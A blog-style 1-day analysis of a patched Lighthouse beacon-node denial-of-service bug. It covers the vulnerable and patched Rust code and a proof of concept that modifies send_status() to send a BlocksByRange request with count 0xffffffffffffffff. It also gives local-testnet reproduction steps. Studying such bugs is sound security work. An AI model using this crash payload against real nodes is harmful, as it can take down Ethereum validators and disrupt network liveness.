CL-2023-01

kind_killerwhale 2024. 5. 13. 02:03

Bug Short Description

The lighthouse beacon nodes can be crashed via malicious BlocksByRange messages containing an overly large 'count' value.

Type : DoS

Report Link : https://notes.ethereum.org/mw-M7HxuRM-09nSPVqp52A

Affected Clients : Lighthouse

Severity : High

Bounty Reward (USD) : 50,000

Attack Scenario

Category : Insufficient Validation

Attackers are able to crash lighthouse nodes by sending malicious BlocksByRange messages. For reference, the relevant message structs are as follows:

(beacon_node/lighthouse_network/src/rpc/methods.rs)

/// Request a number of beacon block roots from a peer.
#[derive(Encode, Decode, Clone, Debug, PartialEq)]
pub struct BlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,
}

/// Request a number of beacon block roots from a peer.
#[derive(Encode, Decode, Clone, Debug, PartialEq)]
pub struct OldBlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,

    /// The step increment to receive blocks.
    ///
    /// A value of 1 returns every block.
    /// A value of 2 returns every second block.
    /// A value of 3 returns every third block and so on.
    pub step: u64,
}

Cause Case : Insufficient Validation

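The bug occurs because the count value from an incoming BlocksByRange message is used in a memory allocation call without first checking that it is reasonable. The count field is declared as u64 and is passed, unvalidated, to VecDeque::with_capacity() as the capacity of the VecDeque to allocate. Because nothing validates this u64, an attacker can craft a BlocksByRange message so that a very large value reaches VecDeque::with_capacity(), which can trigger an allocation-failure panic.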
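The pattern described above can be reproduced in isolation. The following is a minimal sketch, not Lighthouse code: the function name is hypothetical, and u64 elements stand in for the real response items, whose type is not shown in the excerpt. It uses catch_unwind to observe the panic that the standard library raises when the requested capacity cannot be represented.

```rust
use std::collections::VecDeque;
use std::panic;

/// Mimics the vulnerable pattern: an untrusted `u64` is cast to `usize`
/// and used directly as a `VecDeque` capacity.
/// Returns `true` if the allocation request panicked.
/// (Hypothetical helper for illustration; not part of Lighthouse.)
pub fn unchecked_capacity_panics(untrusted_count: u64) -> bool {
    panic::catch_unwind(move || {
        // `u64` elements are a placeholder for the real item type (an assumption).
        let queue: VecDeque<u64> = VecDeque::with_capacity(untrusted_count as usize);
        queue.capacity()
    })
    .is_err()
}
```

Calling unchecked_capacity_panics(u64::MAX) reports a panic, while a small value such as 16 allocates normally. In a real node the panic is not caught this way, which is why it takes the process down.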

The affected function is inject_fully_negotiated_inbound() in beacon_node/lighthouse_network/src/rpc/handler.rs.

    fn inject_fully_negotiated_inbound(
        &mut self,
        substream: <Self::InboundProtocol as InboundUpgrade<NegotiatedSubstream>>::Output,
        _info: Self::InboundOpenInfo,
    ) {
        // only accept new peer requests when active
        if !matches!(self.state, HandlerState::Active) {
            return;
        }

        let (req, substream) = substream;
        let expected_responses = req.expected_responses();   // [1]

        // store requests that expect responses
        if expected_responses > 0 {
            if self.inbound_substreams.len() < MAX_INBOUND_SUBSTREAMS {
                // Store the stream and tag the output.
                let delay_key = self.inbound_substreams_delay.insert(
                    self.current_inbound_substream_id,
                    Duration::from_secs(RESPONSE_TIMEOUT),
                );
                let awaiting_stream = InboundState::Idle(substream);
                self.inbound_substreams.insert(
                    self.current_inbound_substream_id,
                    InboundInfo {
                        state: awaiting_stream,
                        pending_items: VecDeque::with_capacity(expected_responses as usize),    // [3] pass unvalidated u64 size value as capacity to allocate for VecDeque object
                        delay_key: Some(delay_key),
                        protocol: req.protocol(),
                        request_start_time: Instant::now(),
                        remaining_chunks: expected_responses,
                    },
                );
            } else {
                self.events_out.push(Err(HandlerErr::Inbound {
                    id: self.current_inbound_substream_id,
                    proto: req.protocol(),
                    error: RPCError::HandlerRejected,
                }));
                return self.shutdown(None);
            }
        }

....

    /// Number of responses expected for this request.
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => req.count,    // [2] for a BlocksByRange message, return the unvalidated u64 'count' member found in the BlocksByRange message itself
            InboundRequest::BlocksByRoot(req) => req.block_roots.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
        }
    }

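inject_fully_negotiated_inbound() initializes expected_responses by calling expected_responses() on the request [1]. For a BlocksByRange request, that function returns the count field taken straight from the message [2], so the attacker controls it. The value then flows into pending_items: VecDeque::with_capacity(expected_responses as usize) [3]. If the requested capacity is too large, a panic occurs.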

Two cases

- If the allocation panics, the panic handling in generate_monitor() in common/task_executor/src/lib.rs runs and the node crashes.
- The attacker sends a count that is small enough for the allocation to succeed but large enough that the OS OOM killer terminates the process with SIGKILL.
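A rough way to see the difference between the two cases is to compute how many bytes a given count asks for. The sketch below is an illustration only: requested_bytes is a hypothetical helper, and the 8-byte element used in the example calls is a placeholder, since the real element type of pending_items is not shown in the excerpt.

```rust
use std::mem::size_of;

/// Bytes that a buffer of `count` elements of type `T` would need,
/// or `None` if the multiplication overflows a `u64`.
/// (Hypothetical helper for illustration; not part of Lighthouse.)
pub fn requested_bytes<T>(count: u64) -> Option<u64> {
    count.checked_mul(size_of::<T>() as u64)
}
```

With 8-byte elements, requested_bytes::<u64>(u64::MAX) is None, because the size cannot even be represented; this corresponds to the first case. A count of 1 << 34 gives Some(1 << 37), that is 128 GiB, which is representable but far more memory than a node should hand to a single peer request; a value in this range corresponds to the second case.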

Impacts

An attacker can crash arbitrary Lighthouse nodes, which can cause serious liveness and PoS consensus problems on the network.

Patch

I looked for the relevant issue or commit through GitHub blame but could not find the patch history, so I compared the old code against the latest code to see how the bug was patched.

    fn on_fully_negotiated_inbound(&mut self, substream: InboundOutput<Stream, TSpec>) {
        // only accept new peer requests when active
        if !matches!(self.state, HandlerState::Active) {
            return;
        }

        let (req, substream) = substream;
        let expected_responses = req.expected_responses(); // [1]

        // store requests that expect responses
        if expected_responses > 0 {
            if self.inbound_substreams.len() < MAX_INBOUND_SUBSTREAMS {
                // Store the stream and tag the output.
                let delay_key = self
                    .inbound_substreams_delay
                    .insert(self.current_inbound_substream_id, self.resp_timeout);
                let awaiting_stream = InboundState::Idle(substream);
                self.inbound_substreams.insert(
                    self.current_inbound_substream_id,
                    InboundInfo {
                        state: awaiting_stream,
                        pending_items: VecDeque::with_capacity(std::cmp::min(
                            expected_responses,
                            128,
                        ) as usize), // [3]
                        delay_key: Some(delay_key),
                        protocol: req.versioned_protocol().protocol(),
                        request_start_time: Instant::now(),
                        remaining_chunks: expected_responses,
                    },
                );
            } else {
                self.events_out.push(HandlerEvent::Err(HandlerErr::Inbound {
                    id: self.current_inbound_substream_id,
                    proto: req.versioned_protocol().protocol(),
                    error: RPCError::HandlerRejected,
                }));
                return self.shutdown(None);
            }
        }

....

    /// Number of responses expected for this request.
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => *req.count(),
            InboundRequest::BlocksByRoot(req) => req.block_roots().len() as u64,
            InboundRequest::BlobsByRange(req) => req.max_blobs_requested::<TSpec>(),
            InboundRequest::BlobsByRoot(req) => req.blob_ids.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
            InboundRequest::LightClientBootstrap(_) => 1,
        }
    }

The expected_responses() function

let expected_responses = req.expected_responses(); // [1]

Overall, inject_fully_negotiated_inbound was renamed to on_fully_negotiated_inbound. The line that declares the local variable expected_responses is unchanged.

So let's look at how expected_responses() itself changed.

/// Number of responses expected for this request.
/// Before
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => req.count,    // [2] for a BlocksByRange message, return the unvalidated u64 'count' member found in the BlocksByRange message itself
            InboundRequest::BlocksByRoot(req) => req.block_roots.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
        }
    }

/// Number of responses expected for this request.
/// After
/// lighthouse/beacon_node/lighthouse_network/src/rpc/protocol.rs
    pub fn expected_responses(&self) -> u64 {
        match self {
            InboundRequest::Status(_) => 1,
            InboundRequest::Goodbye(_) => 0,
            InboundRequest::BlocksByRange(req) => *req.count(),
            InboundRequest::BlocksByRoot(req) => req.block_roots().len() as u64,
            InboundRequest::BlobsByRange(req) => req.max_blobs_requested::<TSpec>(),
            InboundRequest::BlobsByRoot(req) => req.blob_ids.len() as u64,
            InboundRequest::Ping(_) => 1,
            InboundRequest::MetaData(_) => 1,
            InboundRequest::LightClientBootstrap(_) => 1,
        }
    }

Compared with the old code, two BlobsBy* variants (BlobsByRange and BlobsByRoot) were added, along with LightClientBootstrap.

The part to focus on is the BlocksByRange arm. Let's take a look.

#[derive(Debug, Clone, PartialEq)]
pub enum InboundRequest<TSpec: EthSpec> {
    Status(StatusMessage),
    Goodbye(GoodbyeReason),
    BlocksByRange(OldBlocksByRangeRequest),
    BlocksByRoot(BlocksByRootRequest),
    BlobsByRange(BlobsByRangeRequest),
    BlobsByRoot(BlobsByRootRequest),
    LightClientBootstrap(LightClientBootstrapRequest),
    Ping(Ping),
    MetaData(MetadataRequest<TSpec>),
}

pub struct OldBlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,

    /// The step increment to receive blocks.
    ///
    /// A value of 1 returns every block.
    /// A value of 2 returns every second block.
    /// A value of 3 returns every third block and so on.
    pub step: u64,
}

pub struct BlocksByRangeRequest {
    /// The starting slot to request blocks.
    pub start_slot: u64,

    /// The number of blocks from the start slot.
    pub count: u64,
}

InboundRequest::BlocksByRange(req) => req.count became InboundRequest::BlocksByRange(req) => *req.count(). This appears to be in support of later processing; the value returned is still the count carried by the request.
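To make the *req.count() form concrete, here is a small sketch of an accessor that returns a reference and a caller that dereferences it. RangeRequest is a hypothetical stand-in defined only for this example; how the real request type defines count() is not shown in the excerpt.

```rust
/// Hypothetical stand-in for the request type; only `count` matters here.
pub struct RangeRequest {
    pub count: u64,
}

impl RangeRequest {
    /// Accessor that returns a reference, so callers write `*req.count()`.
    pub fn count(&self) -> &u64 {
        &self.count
    }
}

/// Reads the count through the accessor and dereferences it.
pub fn expected_responses(req: &RangeRequest) -> u64 {
    *req.count()
}
```

In this sketch, switching from field access to an accessor does not change the number that comes out, so the bound has to be applied somewhere else.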

/// Before
pending_items: VecDeque::with_capacity(expected_responses as usize),    // [3] pass unvalidated u64 size value as capacity to allocate for VecDeque object

/// After
pending_items: VecDeque::with_capacity(std::cmp::min(
                            expected_responses,
                            128,
                        ) as usize)

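Previously, expected_responses was cast to usize directly with no validation. The patched code first applies std::cmp::min(expected_responses, 128) and only then casts to usize.

In other words, the smaller of expected_responses and 128 is converted to usize, and the VecDeque is created with that capacity. This keeps the requested capacity well below any value that could cause a panic or get the process killed with SIGKILL by the OOM killer.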
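The clamping step can be sketched on its own as follows. This is a minimal illustration under assumptions: the constant name MAX_PREALLOCATED_ITEMS and both function names are hypothetical (the patched code uses the literal 128 inline), and u64 elements are a placeholder for the real item type.

```rust
use std::collections::VecDeque;

/// Upper bound on the preallocated capacity. The value 128 matches the literal
/// in the patched code; the constant name itself is hypothetical.
const MAX_PREALLOCATED_ITEMS: u64 = 128;

/// Clamp an untrusted response count before using it as a capacity.
pub fn bounded_capacity(expected_responses: u64) -> usize {
    std::cmp::min(expected_responses, MAX_PREALLOCATED_ITEMS) as usize
}

/// Build the queue with the clamped capacity (element type is a placeholder).
pub fn new_pending_items(expected_responses: u64) -> VecDeque<u64> {
    VecDeque::with_capacity(bounded_capacity(expected_responses))
}
```

Even with u64::MAX as input, bounded_capacity returns 128 and the queue is created without panicking. The clamp limits only the initial allocation; a VecDeque can still grow later as items are pushed.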

Reproduction

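No single set of versions of the packages needed for reproduction (rust, yarn, nodejs, siren, etc.) was both mutually compatible and suitable for the old Lighthouse release. ⇒ The tooling required 3.5.1 or later, but the latest version before the patch was 3.5.0.
So I took 3.5.1, installed the compatible version of each package, and built it.
Revert the relevant code in 3.5.1 to the old version ⇒ almost nothing else (directories, functions, etc.) appeared to have changed ⇒ feasible.
Diffed lighthouse/beacon_node/lighthouse_network/src/rpc/protocol.rs and handler.rs against the old code and edited them ⇒ protocol.rs was identical; in handler.rs → removed the std::cmp~~ call.
The goal is to put a maliciously large value into a BlocksByRange request → the send_status() function in beacon_node/network/src/router/processor.r has to be modified.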

/// Sends a `Status` message to the peer.
///
/// Called when we first connect to a peer, or when the PeerManager determines we need to
/// re-status.
pub fn send_status(&mut self, peer_id: PeerId) {
    let status_message = status_message(&self.chain);
    debug!(self.log, "Sending Status Request"; "peer" => %peer_id, &status_message);
    self.network
        .send_processor_request(peer_id, Request::Status(status_message));
    // send malicious BlocksByRange message here
    let blocks_by_range_message = BlocksByRangeRequest {
        start_slot: 5,
        count: 0xffffffffffffffff,
    };
    debug!(self.log, "---- Sending BlocksByRangeRequest Request");
    self.network
        .send_processor_request(peer_id, Request::BlocksByRange(blocks_by_range_message));
}

This puts 0xffffffffffffffff, the maximum u64 value (UINT64_MAX), into the count field.

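Build as root with the make command.
In /siren/local-testnet/, open vars.env with vi and change BN_COUNT from 4 to 8 ⇒ 8 logs are generated as well.
./start_local_testnet.sh → However, the current lcli and the command routine inside siren seem to differ, e.g. "option not found" or "could not force overwrite" (it seems the --force option did not exist in the past).
So I rebuilt from an older lcli release and tried to match the options in its setup.sh, and also tried editing the bash scripts to fit the old options, but every attempt failed.
So I decided to just run the local-testnet inside lighthouse and watch the logs in real time.
- tail is used on Linux to watch errors or log files in real time.
- tail -f [FILE_NAME] → keeps following the log in real time without exiting.
- e.g. tail -f app_1.log | grep "panic"
Success → with RUST_BACKTRACE=full set, a panic occurred in beacon_node_1.log.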
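The log check above can also be done after the fact on a saved log. The following is a minimal sketch of a grep-like filter; matching_lines is a hypothetical helper, and it works on text already loaded into memory rather than following a live file the way tail -f does.

```rust
/// Return the lines of `log` that contain `needle`, similar to running
/// `grep` over a finished log file.
/// (Hypothetical helper for illustration.)
pub fn matching_lines<'a>(log: &'a str, needle: &str) -> Vec<&'a str> {
    log.lines().filter(|line| line.contains(needle)).collect()
}
```

For example, reading beacon_node_1.log into a String and calling matching_lines(&contents, "panic") returns only the lines that mention a panic.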

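Afterword and Reference Links

This was my first time analyzing a 1-day in a node, so building up the background knowledge took some time.
Still, once I got used to it and made an effort to understand how the functions and variables work together and how the flow goes, it went well.
In this case there was no patch history from the developers on GitHub, so it was hard to know their reasoning directly, but the bug was not very complex, so I could analyze it by comparing the code myself.
Reproduction took the most time. It was my first attempt and there were many difficulties along the way, but it was not a bad experience.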
Link Reference
- https://github.com/sigp/lighthouse/tree/unstable/scripts/local_testnet
- https://github.com/sigp/siren
